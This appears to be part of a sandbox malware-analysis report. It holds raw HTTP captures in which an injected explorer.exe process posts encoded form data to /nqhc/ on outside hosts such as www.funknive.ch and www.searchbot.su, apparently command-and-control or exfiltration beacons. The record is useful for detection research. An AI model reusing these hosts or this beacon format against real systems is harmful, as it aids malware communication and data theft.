                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.funknive.ch/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 68 4e 41 6f 7a 4a 5a 58 6a 5a 4f 6b 7e 4f 61 78 46 4a 6b 4a 55 68 76 31 64 68 65 6e 71 4b 52 56 59 6b 55 63 6f 5a 36 64 57 61 44 30 54 55 63 58 55 78 7a 56 33 45 48 33 66 4a 39 47 64 57 6a 44 43 79 39 56 76 72 51 63 48 72 30 69 72 47 48 73 61 6d 56 41 62 67 63 75 52 45 70 76 44 5f 67 4f 69 51 69 4c 61 46 70 34 6b 4e 48 71 4f 73 6b 59 4f 79 48 36 53 45 70 72 68 49 49 6a 4a 64 38 72 6a 34 59 72 35 65 6c 38 6f 37 6e 77 4e 41 42 43 78 55 58 5a 33 63 76 6b 71 68 54 33 31 47 6a 5f 70 78 28 39 37 30 30 69 72 61 76 6e 65 72 47 30 52 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=hNAozJZXjZOk~OaxFJkJUhv1dhenqKRVYkUcoZ6dWaD0TUcXUxzV3EH3fJ9GdWjDCy9VvrQcHr0irGHsamVAbgcuREpvD_gOiQiLaFp4kNHqOskYOyH6SEprhIIjJd8rj4Yr5el8o7nwNABCxUXZ3cvkqhT31Gj_px(9700iravnerG0RA).
                                                                                                                                                                                    Nov 21, 2022 19:22:23.439994097 CET1075INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:23 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 162
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Location: https://www.funknive.ch/nqhc/
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    4192.168.11.204982745.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:20:19.376054049 CET495OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.searchbot.su
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.searchbot.su
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 77 35 58 63 4b 78 6a 33 4a 4d 74 72 55 4a 61 52 6c 55 4b 56 30 70 74 4f 30 50 6f 36 35 37 71 38 66 37 30 44 6d 49 4a 38 44 57 66 6c 32 4a 69 76 37 76 75 4b 30 4e 6f 54 33 48 4c 61 63 59 70 58 48 53 4c 33 4a 68 6c 2d 42 54 66 4a 49 55 43 61 36 57 31 51 32 69 79 6f 35 59 51 50 73 4f 4b 4f 45 36 74 66 36 78 47 36 63 69 48 6c 57 6a 61 79 73 79 66 4e 6c 49 47 6f 4f 61 34 4d 78 32 71 51 34 54 63 59 44 69 6d 5a 6d 36 31 6e 37 63 79 46 4c 58 45 49 59 45 5a 79 55 77 73 34 7e 75 46 42 56 4d 34 5a 58 66 38 5f 50 32 32 6b 56 4c 50 52 6e 55 35 48 4f 54 48 65 51 6c 35 65 59 4c 76 58 4b 36 62 30 55 50 55 46 6d 7a 65 36 4f 33 33 74 47 43 73 6e 56 48 73 30 6f 76 71 30 6c 6d 78 4b 5a 36 71 38 67 72 6d 37 58 6b 30 46 54 6d 6a 6b 77 79 59 61 39 55 6f 54 71 78 44 73 50 6d 71 46 47 79 5a 48 66 6d 30 76 51 72 44 42 61 52 4c 2d 52 6e 56 30 78 31 53 53 50 71 32 77 62 67 4c 44 53 2d 34 44 55 43 6a 66 69 4c 7a 44 78 45 34 55 7a 58 39 44 4a 71 47 48 4a 4d 37 78 62 44 68 77 54 61 57 59 61 41 6f 48 63 36 78 34 33 4c 7e 69 6d 59 7a 79 73 4e 45 70 6c 4c 6b 67 78 6f 4e 61 36 5f 62 65 71 33 31 6f 74 43 6b 78 65 75 32 69 6e 6d 78 69 6e 72 56 67 48 72 35 7a 34 70 74 6e 54 67 4a 45 6d 61 78 75 37 36 47 56 44 31 39 49 68 61 42 7a 5a 64 7a 58 6b 42 34 5a 7a 47 54 57 4b 76 79 5f 28 37 72 67 65 49 4a 62 44 78 42 51 77 72 46 72 50 7a 76 33 4d 31 46 4d 39 76 50 35 55 4f 69 76 79 2d 65 32 33 31 47 6d 44 46 4a 48 6b 6d 76 56 63 70 4a 46 71 4c 69 31 69 50 4a 76 45 36 53 74 4d 51 43 4e 72 69 38 5f 4e 79 56 6a 74 39 63 66 54 73 6f 57 64 68 6f 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=9jZPDiqEJGn1w5XcKxj3JMtrUJaRlUKV0ptO0Po657q8f70DmIJ8DWfl2Jiv7vuK0NoT3HLacYpXHSL3Jhl-BTfJIUCa6W1Q2iyo5YQPsOKOE6tf6xG6ciHlWjaysyfNlIGoOa4Mx2qQ4TcYDimZm61n7cyFLXEIYEZyUws4~uFBVM4ZXf8_P22kVLPRnU5HOTHeQl5eYLvXK6b0UPUFmze6O33tGCsnVHs0ovq0lmxKZ6q8grm7Xk0FTmjkwyYa9UoTqxDsPmqFGyZHfm0vQrDBaRL-RnV0x1SSPq2wbgLDS-4DUCjfiLzDxE4UzX9DJqGHJM7xbDhwTaWYaAoHc6x43L~imYzysNEplLkgxoNa6_beq31otCkxeu2inmxinrVgHr5z4ptnTgJEmaxu76GVD19IhaBzZdzXkB4ZzGTWKvy_(7rgeIJbDxBQwrFrPzv3M1FM9vP5UOivy-e231GmDFJHkmvVcpJFqLi1iPJvE6StMQCNri8_NyVjt9cfTsoWdho.
                                                                                                                                                                                    Nov 21, 2022 19:20:19.468588114 CET496INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx-reuseport/1.21.1
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:20:19 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    40192.168.11.2049865185.101.158.23980C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:25.463323116 CET1077OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.funknive.ch
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.funknive.ch
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.funknive.ch/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 68 4e 41 6f 7a 4a 5a 58 6a 5a 4f 6b 78 4f 71 78 45 75 77 4a 46 78 76 79 42 78 65 6e 6b 71 51 53 59 6b 6f 63 6f 59 7e 4e 57 6f 58 30 64 56 73 58 58 77 7a 56 6b 30 48 33 4e 70 39 48 5a 57 6a 59 43 79 35 33 76 70 45 63 48 72 67 69 70 30 50 73 53 32 56 42 44 77 63 68 59 6b 70 71 48 5f 67 41 69 51 76 67 61 45 39 34 6b 63 28 71 50 74 49 59 4c 6a 48 6c 57 6b 6f 67 6e 49 49 67 43 39 38 6c 6a 5f 52 55 35 62 4a 47 6f 4b 6a 77 4e 67 68 43 67 6b 58 61 39 73 76 6e 31 52 53 56 6b 58 43 37 73 52 28 32 69 78 55 36 73 62 4f 56 4c 59 6e 34 42 49 6c 4b 6f 70 48 2d 49 6d 55 68 28 48 4f 45 35 61 75 4c 51 71 6a 36 58 77 42 50 42 36 67 59 71 34 6d 5a 7e 30 68 31 33 66 58 49 6a 4c 54 36 75 4e 6a 48 4a 66 66 65 6c 70 6d 32 55 73 4f 30 73 4e 35 67 35 79 4f 69 70 61 46 48 51 38 6c 48 58 33 6b 64 37 2d 34 6c 79 63 66 6f 64 69 79 31 6b 6e 28 34 72 37 6d 75 4d 4d 34 53 31 55 54 4e 67 72 6b 4c 47 69 28 51 63 6c 79 76 77 74 64 69 4c 44 54 34 75 59 62 36 45 74 4a 65 58 58 71 39 71 77 54 56 56 7a 64 30 63 5f 49 59 6e 6b 41 4c 62 75 4d 67 51 31 63 43 76 6f 37 65 71 48 69 41 55 52 37 32 78 4f 34 62 4f 41 77 6b 68 78 78 6c 53 6d 65 61 35 77 43 4d 6b 35 49 66 51 6b 6d 4f 6c 6e 32 4d 6b 78 7e 48 70 73 68 59 41 38 4f 53 42 75 35 70 62 71 50 6b 42 68 66 4c 6d 34 35 71 31 56 64 70 72 7a 5a 33 66 51 28 50 34 51 54 58 49 54 59 77 4f 50 71 57 72 4f 66 35 33 59 78 32 76 6d 7e 59 5a 79 30 33 71 58 4b 45 6d 4d 75 43 7e 4d 69 79 58 4f 36 5f 63 4e 38 68 50 4c 34 48 57 66 4a 33 52 51 6b 54 68 7a 51 45 6f 39 72 36 68 42 38 4b 6d 4e 59 38 76 6f 6d 4c 58 36 7e 4d 71 42 52 49 6e 38 34 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=hNAozJZXjZOkxOqxEuwJFxvyBxenkqQSYkocoY~NWoX0dVsXXwzVk0H3Np9HZWjYCy53vpEcHrgip0PsS2VBDwchYkpqH_gAiQvgaE94kc(qPtIYLjHlWkognIIgC98lj_RU5bJGoKjwNghCgkXa9svn1RSVkXC7sR(2ixU6sbOVLYn4BIlKopH-ImUh(HOE5auLQqj6XwBPB6gYq4mZ~0h13fXIjLT6uNjHJffelpm2UsO0sN5g5yOipaFHQ8lHX3kd7-4lycfodiy1kn(4r7muMM4S1UTNgrkLGi(QclyvwtdiLDT4uYb6EtJeXXq9qwTVVzd0c_IYnkALbuMgQ1cCvo7eqHiAUR72xO4bOAwkhxxlSmea5wCMk5IfQkmOln2Mkx~HpshYA8OSBu5pbqPkBhfLm45q1VdprzZ3fQ(P4QTXITYwOPqWrOf53Yx2vm~YZy03qXKEmMuC~MiyXO6_cN8hPL4HWfJ3RQkThzQEo9r6hB8KmNY8vomLX6~MqBRIn84.
                                                                                                                                                                                    Nov 21, 2022 19:22:25.480854988 CET1078INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:25 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 162
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Location: https://www.funknive.ch/nqhc/
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    41192.168.11.2049866185.101.158.23980C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:27.510642052 CET1082OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.funknive.ch
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.funknive.ch
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.funknive.ch/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 68 4e 41 6f 7a 4a 5a 58 6a 5a 4f 6b 78 4f 71 78 45 75 77 4a 46 78 76 79 42 78 65 6e 6b 71 51 53 59 6b 6f 63 6f 59 7e 4e 57 6f 76 30 64 6a 77 58 56 54 4c 56 31 45 48 33 57 70 39 4b 5a 57 69 59 43 32 74 7a 76 70 59 69 48 70 59 69 70 6e 33 73 54 46 78 42 57 41 63 73 64 6b 70 6f 44 5f 67 55 69 51 6a 30 61 45 70 6f 6b 4d 6a 71 4f 74 34 59 4f 51 28 36 4c 45 70 72 6e 49 49 73 47 39 39 59 6a 35 4e 45 35 62 4e 47 6f 49 6e 77 66 6d 6c 43 77 6b 72 61 36 38 76 34 37 78 53 65 39 48 43 53 73 52 61 48 69 78 55 31 73 5a 69 56 4c 62 76 34 54 5f 52 4e 70 4a 48 2d 57 32 55 67 73 53 57 49 35 61 44 49 51 71 37 36 58 79 52 50 41 61 67 59 34 74 61 57 7a 45 68 33 38 5f 58 62 31 37 66 69 75 4a 44 35 4a 66 37 65 6b 5a 79 32 53 62 36 30 6a 50 42 67 6d 69 4f 67 6e 36 46 59 62 63 6b 63 58 33 30 5f 37 5f 59 31 79 66 54 6f 62 77 36 31 68 47 28 37 74 62 6d 73 53 38 35 61 6a 55 50 4a 67 72 30 58 47 69 28 2d 63 6b 6d 76 33 64 42 69 4b 47 7a 37 74 49 62 35 43 74 49 63 5a 48 57 7a 71 77 66 4f 56 7a 46 61 63 38 45 59 32 30 41 4c 65 4a 51 76 61 46 64 72 79 34 37 4d 6b 6e 6a 49 55 52 33 41 78 4c 49 4c 4f 51 63 6b 67 42 68 6c 44 47 65 5a 79 77 44 6b 76 5a 49 64 61 30 6d 4f 6c 6e 4c 37 6b 30 6d 48 70 39 5a 59 42 4c 71 53 45 39 52 70 57 4b 50 6d 42 68 66 34 6d 34 31 6e 31 56 56 32 72 7a 70 52 66 53 7a 50 34 6b 58 58 50 57 73 33 59 50 71 58 67 75 66 55 6f 49 39 68 76 6d 69 41 5a 79 6c 41 74 6b 7e 45 30 38 7e 43 70 73 6a 6b 43 65 36 30 57 74 38 7a 59 37 30 4c 57 65 67 41 52 52 68 49 68 79 30 45 70 63 75 36 39 69 68 54 6c 5f 59 7a 67 59 36 41 59 34 36 6a 78 69 52 41 39 38 39 54 79 50 42 69 47 46 66 6a 62 45 36 54 52 53 7a 73 65 78 31 7a 53 63 41 67 6b 62 6e 4a 4d 53 68 5a 65 4d 39 32 76 58 56 46 4f 56 70 55 34 79 57 4d 32 6a 30 69 47 58 58 74 6c 55 5a 45 50 51 30 47 43 36 38 34 5a 74 36 53 6e 44 5a 32 7a 45 66 34 44 73 6a 30 53 4d 37 70 45 5a 49 52 6e 70 6b 49 50 4f 6a 68 6d 7a 73 53 32 62 48 57 63 70 36 6d 54 6e 61 77 67 56 61 35 5a 43 5a 4c 5a 5a 7a 74 4a 5a 4d 55 46 36 6b 43 4b 62 6c 2d 4a 57 37 52 55 6b 68 32 56 7a 5a 36 4a 47 55 77 4b 4f 54 4b 6d 4a 36 64 38 51 75 4b 35 42 42 7a 72 73 47 44 6e 4c 34 4a 66 5f 73 47 77 4a 66 76 36 69 54 31 49 47 34 31 7a 7a 7a 55 6a 34 56 39 65 73 57 54 71 36 49 67 31 76 63 58 32 31 41 39 6e 69 4c 74 4e 68 6e 7a 34 75 35 2d 6d 78 51 56 31 6a 4b 5a 5a 65 47 33 56 7a 62 63 74 4a 70 6e 4a 64 4a 68 78 4c 30 39 37 4c 41 79 45 6a 73 47 73 63 49 33 58 42 58 55 6a 6a 6a 68 48 5f 64 54 35 6b 4b 7a 52 72 6d 53 49 31 58 2d 71 4b 46 44 4b 71 74 48 33 66 41 73 4f 74 71 72 6c 48 7a 34 33 4b 79 4e 41 44 7a 37 47 33 67 4e 54 79 76 79 6d 37 6f 67 54 54 6b 72 78 55 75 70 69 41 33 7a 36 49 6b 7a 34 63 69 64 38 4e 71 31 71 71 53 38 6b 4b 51 58 45 4d 68 34 36 39 53 38 64 4d 46 43 4c 62 36 5a 62 66 28 4e 50 50 76 52 62 33 55 35 4e 30 58 4b 50 74 64 63 5a 4b 33 42 51 38 49 33 37 6d 4a 57 51 47 32 6a 6e 65 7e 33 70 6e 39 74 4a 71 43 47 34 6b 55 50 76 6e 79 51 37 37 34 4a 34 68 47 43 78 41 7a 68 6b 5a 31 49 33 39 67 47 63 65 74 42 47 49 68 2d 73 79 59 49 43 37 41 73 72 4a 65 33 43 43 38 6b 6b 4a 50 6a 59 6b 70 78 52 4b 53 67 7e 4f 28 46 76 70 45 71 31 6a 59 6a 4d 41 4d 49 76 70 36 33 78 31 34 47 7e 32 55 31 7e 61 6f 57 63 6f 33 39 53 64 53 6b 39 62 39 37 77 66 76 6a 4c 42 74 61 67 57 64 38 72 5f 52 78 6b 4f 6b 32 4e 5f 4a 78 62 7a 49 6c 34 43 67 5a 4c 6e 70 51 56 74 34 49 39 64 4e 54 79 32 6f 4a 49 4b 56 46 48 5a 51 34 78 46 75 47 32 49 64 50 46 63 57 50 41 61 72 72 75 6e 4b 4d 43 44 32 38 5a 76 6f 41 34 38 37 37 39 5a 63 43 75 4d 6c 55 33 46 51 33 6f 56 32 59 46 33 58 34 33 52 38 44 79 74 52 39 4f 55 62 79 63 65 4f 64 4e 44 56 44 73 64 53 64 67 4f 4e 57 76 48 67 77 65 53 44 32 47 6a 67 77 73 75 43 4a 43 61 36 62 38 61 6f 6a 36 50 4e 43 78 4b 7e 4e 72 69 33 73 32 56 6d 6c 7e 50 73 32 4d 33 70 72 69 70 54 74 43 71 54 51 46 50 65 41 57 41 36 6b 48 71 7e 6e 47 44 75 6f 38 59 32 38 74 66 67 51 6c 5f 30 77 54 4c 39 78 6a 78 34 36 71 63 31 41 37 55 45 52 37 62 38 4b 7e 78 72 38 50 65 70 76 69 64 56 57 67 31 35 52 6f 72 75 38 63 36 64 73 6b 33 72 42 56 4f 52 66 65 4b 66 75 46 38 5a 61 50 65 4c 75 76 31 48 59 57 5a 6d 61 4b 6f 36 66 28
                                                                                                                                                                                    Data Ascii: r4txB=hNAozJZXjZOkxOqxEuwJFxvyBxenkqQSYkocoY~NWov0djwXVTLV1EH3Wp9KZWiYC2tzvpYiHpYipn3sTFxBWAcsdkpoD_gUiQj0aEpokMjqOt4YOQ(6LEprnIIsG99Yj5NE5bNGoInwfmlCwkra68v47xSe9HCSsRaHixU1sZiVLbv4T_RNpJH-W2UgsSWI5aDIQq76XyRPAagY4taWzEh38_Xb17fiuJD5Jf7ekZy2Sb60jPBgmiOgn6FYbckcX30_7_Y1yfTobw61hG(7tbmsS85ajUPJgr0XGi(-ckmv3dBiKGz7tIb5CtIcZHWzqwfOVzFac8EY20ALeJQvaFdry47MknjIUR3AxLILOQckgBhlDGeZywDkvZIda0mOlnL7k0mHp9ZYBLqSE9RpWKPmBhf4m41n1VV2rzpRfSzP4kXXPWs3YPqXgufUoI9hvmiAZylAtk~E08~CpsjkCe60Wt8zY70LWegARRhIhy0Epcu69ihTl_YzgY6AY46jxiRA989TyPBiGFfjbE6TRSzsex1zScAgkbnJMShZeM92vXVFOVpU4yWM2j0iGXXtlUZEPQ0GC684Zt6SnDZ2zEf4Dsj0SM7pEZIRnpkIPOjhmzsS2bHWcp6mTnawgVa5ZCZLZZztJZMUF6kCKbl-JW7RUkh2VzZ6JGUwKOTKmJ6d8QuK5BBzrsGDnL4Jf_sGwJfv6iT1IG41zzzUj4V9esWTq6Ig1vcX21A9niLtNhnz4u5-mxQV1jKZZeG3VzbctJpnJdJhxL097LAyEjsGscI3XBXUjjjhH_dT5kKzRrmSI1X-qKFDKqtH3fAsOtqrlHz43KyNADz7G3gNTyvym7ogTTkrxUupiA3z6Ikz4cid8Nq1qqS8kKQXEMh469S8dMFCLb6Zbf(NPPvRb3U5N0XKPtdcZK3BQ8I37mJWQG2jne~3pn9tJqCG4kUPvnyQ774J4hGCxAzhkZ1I39gGcetBGIh-syYIC7AsrJe3CC8kkJPjYkpxRKSg~O(FvpEq1jYjMAMIvp63x14G~2U1~aoWco39SdSk9b97wfvjLBtagWd8r_RxkOk2N_JxbzIl4CgZLnpQVt4I9dNTy2oJIKVFHZQ4xFuG2IdPFcWPAarrunKMCD28ZvoA48779ZcCuMlU3FQ3oV2YF3X43R8DytR9OUbyceOdNDVDsdSdgONWvHgweSD2GjgwsuCJCa6b8aoj6PNCxK~Nri3s2Vml~Ps2M3pripTtCqTQFPeAWA6kHq~nGDuo8Y28tfgQl_0wTL9xjx46qc1A7UER7b8K~xr8PepvidVWg15Roru8c6dsk3rBVORfeKfuF8ZaPeLuv1HYWZmaKo6f(iuhUypgaILhRQf3aIGBg5fgE-bZMxILiEeD8Xl0tKUSFvh6EMHnYNUhTA4Ko4bMLqxsRSUNinQyN72UEqCHahjW5JTyy0uclxEari(Fy0aXpxFMSJgv0SKil7ciWT~8r5r76MI3~Cgbfqo5Nzh1wcR744U5Xq9CyT2OD8fE4B8colbBJKzxWtYFr2xba4u5ET(EIT8Q3G5fLk4kNoiNfCu9rMy35NsAdczDfwxBw36KMBahU_g3iPveECkKjX4lX1oFtmZbEmZLVk(Hx0q5B44HAHie(SGoyvMzIU8zXunJuQcnyx6sfuH5~vX0GWLVjgatLpzHUU9tFtGCFg1AH_xjGxw-I310ZNlb0IPQ~C7093r72TpUTSlwwf(NsXmKTX61lIxJfbQSlRvrtO78yepQJdKlnjJpmKlZ7cZ4NYn6qWZUYul5RgqUcOi_TZt_eHVQ4TISF8mlOgHXgvgIHtCUTu~zuMcdZxmr5d43L5v57_Y64fL7Yw24TZbvGQ77bg013t2BM5utwx5Va2iY1_b6Jp7TmOSrQSc4fklQY0W-6mF-OCarAQ66HfAlT1lkHdbJSN2KZZPNAx~3lCgSohzVE54pff9aJx~EcadOw03oHAclN_~K97A6~u8lGCJO(Nm5g59CY2QuX8k7~XPdf3VYr41cPfwi5wJg3Z837j8exMDAW2v-3W2dGcQ9v6xJovA9V_X9TW~zDSUWfwqgkQlEHPLsgCQfpTo3vq(1cCCeEAF9oFCn69fN5HcyAyXjkgfWGwSIgT1iRFnSC8~eRnh1JK1zIw0ZBgpyRGvuDl2JHI4Ns5RgoG~-jhHxj5(V9YdIj2gzhXrS61wbPRfhjy9njakz8MZvhVcxZgRm(wmBwh3ndMvChTCGPoWAGew_B962BvzgT2oIO9nCsInhX-nP(OLz5Jrh51Qng91q9RX3f3MabEez~SVrxu7xa2sz9uB-441j(0JzdqjwW7501SG_CLBc22a8bTtgXBhjc8L7YdJCmWUCgarQTwuKxlsK1otHjaA-K0pjyHcZDe4QiNuVv0LWn60R91yVMLCdRqvxwoVGr5MLj9mRQ3JQuYXWZtg01YcXncGueQOSxCqCHVz2LxWnDAPGxZrI~z9JFQISoqv-QpO1IVjwkJQJ~V(_m6H5K10PmzoJJpCB(MVUqnC-ZIMaz5k-SvvtJ6NFUxgyZjI8gVNcjpJ1M7M4yyojYtyhVgzjhKlhf9A2Ffr6zCdRxmTb(7OdFQaxvhswOhxuVTfyvaWR3WKnx7liCLeRBiZPnoKHhSfHnKjlc2TAIxVczAOZUxcmtfrD~6whS5UgDU1JbYIyL19U3S35qRDBR_w2RuwI1ESQMB~htG5IyfgGQejang1TdQTgS8f6Sa44VMnEpH8-T6CWOFVZ5TQIIc72lLUP1sjPP_it9VHyrrDIApQu~hIyQnZlyYaQz4n-QEM4I07VapbCYE9WGAvjIEKWDJkdFLILt_Epj5g_N7PGUP~BPkOMQGfpmU(FP-QZEczIY8YnbL8pIMSv9yCOv0Ng2H~CugxtuBlOD5l4mQ9PLsMS(SrywV9Yj41CqEdbO7A1MI4dvQge9fTZTm1chNjuD2BZ88xF3E(OhyexUB(qIeTMGEtNwEWbOFu2zpqLAfaPqS0xgDr6vbZzI_RSrLRUivRSzG8gmPCuAZlpOSbL0c9CtW7ET-8hQC3_RayeSkBtHTNjuW~cbd8cD5IfvPRdLjX8CwHXukgnkVzD5dAvAlJfzKHCn1KgwFZbgVnvMKvrlLlHUKtU(AaI1WFDrc9KArq-GaWB3r0FtY(qBH6Eknv7kh6TNSe7O9BIutQ5BHjgWBqTVEWmRB9REg0rFpLhC6eByAG7iL8JBK8008lrMDCMCRRzsSYxo-EuePjy4xAvnOu1o6pck4r1Q_AenYgRDKrLjCBVzwTKL4NL0EjzBqEvr8ZLaCYlk6xQpezj9ER74O4GD7~j8YCZt8JffATutZqCuSXmj34CVdT91F4vzXTnWYdKTXOt1CYjFePtmDzMKsXeZbippRtDdjTatt75bsuO9VCWMUqcPbGVOq3BG_jWJN2iecnPB1Rrfl4SM78K~1AIJY2iB
                                                                                                                                                                                    Nov 21, 2022 19:22:27.510679960 CET1088OUTData Raw: 77 62 70 57 61 6d 49 7e 6f 44 76 41 58 47 34 79 77 6f 46 47 33 45 43 69 49 55 42 57 53 30 6a 56 58 34 56 76 65 71 44 79 44 35 4a 58 39 47 32 73 72 51 6e 39 69 77 66 30 48 31 6a 75 5f 32 76 72 7a 4d 7a 66 4c 53 78 54 48 47 59 50 31 48 76 66 4a 4f
